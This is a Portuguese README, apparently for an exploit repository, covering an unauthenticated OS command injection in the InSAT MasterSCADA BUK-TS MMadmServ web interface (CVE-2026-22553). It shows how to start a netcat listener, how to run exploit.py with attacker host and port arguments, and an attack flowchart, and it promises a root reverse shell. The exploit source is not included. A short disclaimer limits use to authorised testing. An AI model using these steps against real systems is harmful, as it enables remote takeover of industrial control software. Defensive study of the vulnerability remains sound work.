
Exploit de injeção de comandos do sistema operacional sem autenticação para a interface web InSAT MasterSCADA BUK-TS MMadmServ. Entrega shell reversa com privilégios de root via requisição HTTP POST. CVSS 9.8 crítico.
CVE-2026-22553 | CVSS 9.8 Crítico| Autor do Exploit: Mohammed Idrees Banyamer
O InSAT MasterSCADA BUK-TS sofre de uma vulnerabilidade de Injeção de Comandos no Sistema Operacional sem Autenticação na interface web MMadmServ. Essa falha permite que atacantes remotos obtenham execução remota de código (RCE) completa sem qualquer autenticação.
flowchart TD
A[Attacker] -->|HTTP POST Request| B[MMadmServ Web Interface]
B -->|Unauthenticated| C[Vulnerable Parameter]
C -->|OS Command Injection| D[Command Execution on Target Server]
D -->|Reverse Shell| E[Attacker's Listener\nnc -lvnp <port>]
style A fill:#ff4d4d,stroke:#fff
style E fill:#4dff88,stroke:#fffpython3 exploit.py <target_url> --lhost <your_ip> --lport <your_port>
python3 exploit.py http://192.168.1.50:8080 --lhost 192.168.1.100 --lport 4444
| Opção | Descrição |
|---|---|
target | URL alvo (ex.: http://ip:port) |
--lhost | Seu endereço IP (reverse shell) |
--lport | Sua porta de escuta |
Inicie um listener na sua máquina:
nc -lvnp 4444
Execute o exploit:
python3 exploit.py http://target-ip:port --lhost your-ip --lport 4444
Obtenha um reverse shell com privilégios de root/sistema.
Este exploit é fornecido apenas para fins educacionais e de testes de penetração autorizados.
O uso não autorizado contra sistemas que você não possui é ilegal e pode violar leis internacionais.
O autor não é responsável por qualquer uso indevido.
Mohammed Idrees Banyamer
Deixe uma estrela ⭐ neste repositório se você o achou útil!